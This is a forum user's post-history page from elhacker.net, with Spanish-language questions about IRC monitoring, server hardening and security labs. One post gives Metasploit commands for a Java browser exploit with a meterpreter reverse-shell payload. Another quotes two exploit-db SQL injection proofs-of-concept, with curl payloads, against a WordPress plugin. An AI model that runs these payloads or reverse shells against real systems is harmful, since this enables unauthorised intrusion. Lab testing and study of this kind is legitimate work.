elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: [1] 2 3 4 5 6
1  Seguridad Informática / Nivel Web / Re: Tutotial - Bypaseando un Firewall, WAF, Mod Security de Apache y Filtros de IIS en: 7 Julio 2016, 16:37 pm
Buenísimo WHK! Hacia un muchísimo tiempo que no pasaba por este foro y me ha dado mucha pena ver algunas cosas. Me sorprende que este post no tenga ningun comentario.

Buenísimo de verdad.

Saludos! ;)
2  Comunicaciones / Mensajería / Re: Monitorizar IRC desde el cliente en: 24 Febrero 2014, 15:22 pm
Muchas gracias, tirare por ahi entonces. Creo que python es una buena forma de comenzar.

Saludos!
3  Comunicaciones / Mensajería / Monitorizar IRC desde el cliente en: 24 Febrero 2014, 11:17 am
Hola a todos,

Estoy realizando un trabajo sobre IRC y me gustaría obtener información sobre los programas o tecnicas para un canal pero desde el lado del cliente. Guardar conversaciones publicas, conexiones y desconexiones de usuarios... etc.

¿Sabeis si existe algo al respecto? Gracias por adelantado,

Saludos!
4  Sistemas Operativos / GNU/Linux / Re: Actualizar CentOS PHP 5.3 en: 12 Julio 2013, 14:52 pm
Gracias r32 por tu respuesta!! A ver si alguien más que sepa dice algo...
5  Sistemas Operativos / GNU/Linux / Actualizar CentOS PHP 5.3 en: 11 Julio 2013, 13:30 pm
Hola a todos!!

Estoy intentando fortalecer un servidor Apache Tomcat version: 2.2.15 corriendo en un Centos 6.4. Para hacer unas pruebas iniciales le he tirado OpenVAS y a parte de otras alertas me ha dicho que la version de PHP es 5.3< 5.3.6 y que debe ser actualizada.

Me han comentado que aunque pase esto, puede ser que la version 5.3 para CentOS 6.4 ya este parcheada sin necesidad de actualizarla a una superior. Puede ser esto? Me parece un poco raro pero no se...

Gracias a todos, espero vuestras respuestas ;)
6  Seguridad Informática / Bugs y Exploits / Re: Escaneo Anonimo? en: 10 Junio 2013, 22:10 pm
proxychains, TOR... depende puedes empezar investigando por ahí... Saludos!
7  Seguridad Informática / Bugs y Exploits / Metasploit out of LAN en: 10 Junio 2013, 20:57 pm
Buenas a todos:

He visto temas parecidos por el foro pero en ninguno se llega a ninguna conclusión sobre el problema.

He montado en casa un laboratorio para testear Metasploit fuera de LAN compuesto por dos ordenadores conectados a 2 routers diferentes de IP pública diferente.

MAQUINA1

PC corriendo Máquina Virtual Kali Linux
IP privada 192.168.1.16
IP publica 88.88.88.88 (inventada por motivos de seguridad)
El router tiene los puertos (80,445 y 4444) fordwardeados a la IP 192.168.1.16

MAQUINA2

Laptot corriendo Máquina Virtual Windows XP SP2 (Java 7 update 6)
El router se supone que no es necesario que tenga ningún puerto abierto puesto que cuando se ejecuta el exploit entra en juego NATP


*******************************************************

En la MAQUINA1

use exploit/multi/browser/java_jre17_reflection_types
set SRVHOST 192.168.1.16
set SRVPORT 80
set URIPATH /ataque

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 88.88.88.88

exploit


En la MAQUINA2

Entro en la URL a través del navegador en la URL 88.88.88.88/ataque

Saltan las alertas de ejecutar un applet de java etc... ACEPTO TODO y parece que se empieza a ejecutar el Applet pero salta una alerta que dice "No se pudo ejecutar el programa".

Metasploit se queda a la espera de un sesión pero no sucede nada... Sinceramente no se que ocurre. He probado el mismo ataque en local y no hay problemas. ¿Alguna idea?

Gracias por adelantado, Saludos ;)


8  Seguridad Informática / Nivel Web / Re: Dos exploits para WordPress Bannerize Plugin en: 23 Enero 2013, 20:15 pm
Solucionado. Dejo el Post por si acaso a alguien le viene bien!

http://www.linuxhispano.net/2009/11/26/navega-por-internet-conquista-la-web-con-curl-parte-1/
9  Seguridad Informática / Nivel Web / Dos exploits para WordPress Bannerize Plugin en: 23 Enero 2013, 20:11 pm
Hola a todos,

Tengo un par de exploits a nivel web que no se como se tiran. Son de tipo SQL injection pero creo que no se pueden utilizar en la URL, ¿donde debería utilizarlos?. Os dejo los links de exploit-db y el fuente. Gracias por la ayuda ;)

http://www.exploit-db.com/exploits/17906/

Código:

# Exploit Title: WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability
# Date: 2011-09-22
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-bannerize.zip
# Version: 2.8.7 (tested)
 
---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
 limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
 
e.g.
curl --data "limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
 
---------------
Vulnerable code
---------------
if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {
    ...
    $limit = intval($_POST['limit']);
    $page_offset = (intval($_POST['offset']) - 1) * $limit;
 
    foreach($_POST["item"] as $key => $value){
        $sql = sprintf("UPDATE `%s` SET `sorter` = %s WHERE id = %s", $wpdb->prefix ."bannerize_b", (intval($key)+$page_offset ), $value );
        $result = mysql_query($sql);
    }
}


http://www.exploit-db.com/exploits/17764/

Código:
# Exploit Title: WordPress WP Bannerize plugin <= 2.8.6 SQL Injection Vulnerability
# Date: 2011-08-31
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-bannerize.zip
# Version: 2.8.6 (tested)
 
---
PoC
---
curl --data "id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)-- " -H "X-Requested-With:XMLHttpRequest" http://www.site.com/wp-content/plugins/wp-bannerize/ajax_clickcounter.php
 
---------------
Vulnerable code
---------------
if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {
    ...
    $sql = "UPDATE `" . $wpdb->prefix ."bannerize_b` SET `clickcount` = `clickcount`+1 WHERE id = " . $_POST['id'];
    $result = mysql_query($sql);


10  Seguridad Informática / Hacking Wireless / Re: Redes abiertas con panel de autenticación en: 9 Enero 2013, 22:33 pm
Muchas gracias a todos, me habeis dado las 2 claves para buscar "hotspot" y "portal cautivo" el resto lo hace google... En el primer vistazo he encontrado howtos, vectores de ataque, auditorias, fortificación resumiendo, bastante para profundizar en el tema.

Gracias otra vez! Saludos
Páginas: [1] 2 3 4 5 6
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines